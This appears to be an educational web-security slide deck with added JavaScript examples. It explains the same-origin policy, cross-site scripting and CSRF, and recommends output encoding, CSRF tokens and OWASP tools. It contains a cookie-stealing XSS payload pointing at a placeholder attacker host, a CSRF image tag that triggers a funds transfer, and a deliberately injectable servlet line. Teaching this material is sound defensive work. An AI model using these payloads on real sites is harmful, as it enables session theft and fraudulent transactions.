Origins, Cookies and Security –
Oh My!
John Kemp, Nokia Mobile Solutions
What is the “Same-Origin Policy”?
• A document or script loaded from one Web origin may not read or manipulate
properties of, or communicate directly with, a document loaded from another
Web origin.
• Server-side security enforced by the client (the Web browser!); the server
has no way to check it.
• The (scheme, host, port) triple identifies a unique origin; path, query and
fragment do not matter.
• Doesn’t restrict a document from embedding resources from other origins
(<img src…>, <script src…>), and the browser attaches the target site’s
cookies to those requests.
• Everyone wants to get around it (see <script src>, JSONP, CORS)
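An added example (not from the original slides) of the scheme/host/port rule as a browser applies it. It uses the WHATWG URL parser that browsers and Node share, so default ports are normalised and everything after the authority is ignored; the URL pairs are constructed test cases.

```javascript
// Added example: how a browser decides whether two URLs share an origin.
// Only scheme, host and port take part; path, query and fragment are ignored.
function originOf(urlString) {
  const u = new URL(urlString);
  // URL.origin already applies the rule; rebuild it so the three parts are visible.
  // u.port is "" when the port is the scheme's default (80 for http, 443 for https).
  const port = u.port === "" ? "" : ":" + u.port;
  return `${u.protocol}//${u.hostname}${port}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Constructed cases: [url, url, expected].
const CASES = [
  ["http://example.com/app/a", "http://example.com/other/b?x=1#f", true], // path/query/fragment ignored
  ["http://example.com", "http://example.com:80/", true],                  // default port normalised
  ["https://example.com/", "https://EXAMPLE.com/", true],                   // host is case-insensitive
  ["http://example.com", "https://example.com", false],                    // scheme differs
  ["http://example.com", "http://www.example.com", false],                 // host differs
  ["http://example.com", "http://example.com:8080", false],                // port differs
];

// Returns true only if every case matches the expectation.
function checkAll() {
  return CASES.every(([a, b, expected]) => sameOrigin(a, b) === expected);
}
```

Note that `sameOrigin` says nothing about whether a request may be *sent*: an `<img src>` or `<script src>` to a foreign origin goes out regardless, cookies included, which is the gap the CSRF slide exploits.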
Why a same-origin policy?
• Netscape 2.0 shipped JavaScript in a browser that already had cookies
• HTTP Authentication
• Cookies created a session state mechanism for
HTTP
• HTTP authentication created a login session
state for HTTP
• One site can cause this state to be sent to
another site: the browser attaches cookies and credentials to every request
for that site, whoever triggered the request
What the same-origin policy does not stop
• Impersonation of a legitimate user: the browser sends that user’s cookies
or HTTP credentials with any request to the site, however the request was
caused
• Impersonation of a legitimate site: the Referer HTTP header can be omitted
or forged, so it does not prove where a request came from
Leading to...
• Cross-site scripting
• Cross-site request forgery
• …and generally bad things for the user and the victim site
Cross-site scripting
• Web app code (Java servlet; the request parameter goes straight into an
HTML attribute):
(String) page += "<input name='creditcard' type='TEXT' value='" +
request.getParameter("CC") + "'>";
• Attacker changes the “CC” value to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
• The quote and bracket close the attribute and the element, so the script
runs in the victim site’s origin and can read its cookies.
• All your session are belong to us!!!
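An added example (not from the original slides) that rewrites the slide’s servlet line in Node-style JavaScript next to an output-encoded version, and runs the slide’s payload through both. The `escapeHtml` helper and the function names are this example’s own; the payload string is the one on the slide.

```javascript
// Added example: the vulnerable concatenation from the slide, and the same
// markup with the untrusted value encoded for HTML attribute context.

// Vulnerable: the parameter is pasted straight into a single-quoted attribute.
function buildInputVulnerable(cc) {
  return "<input name='creditcard' type='TEXT' value='" + cc + "'>";
}

// Encode the five characters that carry meaning in HTML text and attributes.
// The single quote matters here because the attribute is single-quoted.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: identical markup, untrusted value encoded for the context it lands in.
function buildInputSafe(cc) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtml(cc) + "'>";
}

// The attacker's "CC" value from the slide (constructed here as a string).
const PAYLOAD =
  "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

// Did the payload break out of the attribute and produce a real <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

function demo() {
  return {
    vulnerable: containsScriptTag(buildInputVulnerable(PAYLOAD)), // true: attribute closed, script injected
    safe: containsScriptTag(buildInputSafe(PAYLOAD)),             // false: payload is inert text
  };
}
```

The safe version still contains the attacker’s text, but only as the literal value of the input box; the browser never sees a closing quote or an opening tag. Encoding must match the context: a value written into a JavaScript string or a URL needs a different encoder, which is why the slides point at a library rather than hand-rolled escaping.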
Cross-site Request Forgery
• Victim site has a public state-changing URL, reachable by GET with nothing
but the session cookie to authorise it:
http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
• Attacker makes the victim’s browser fetch that URL from an innocuous-looking
image load on the attacker’s page; the browser sends the victim’s example.com
cookies with it:
<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
• All yr money are belong to us!!!
Some solutions
• Never, ever trust a client!
• Don’t rely solely on cookies, HTTP credentials or the Referer HTTP header
to decide that the user meant to send a request (for example, use CSRF
tokens)
• Validate input supplied by the requesting
user/site
• Encode output: anything supplied by a requesting user/site must be encoded
for the context it is written into (HTML body, attribute, JavaScript, URL)
• Don’t write your own security controls (use OWASP ESAPI
where possible!)
More attacks, more information
• SOP - http://taossa.com/index.php/2007/02/08/same-origin-policy/
• CORS, UMP, XHR - http://www.w3.org/2001/tag/2010/06/01-crossdomain.html
• OWASP – http://www.owasp.org
• OWASP Top 10 - http://www.owasp.org/index.php/Top_10_2010-Main
• OWASP ESAPI - http://owasp-esapi-java.googlecode.com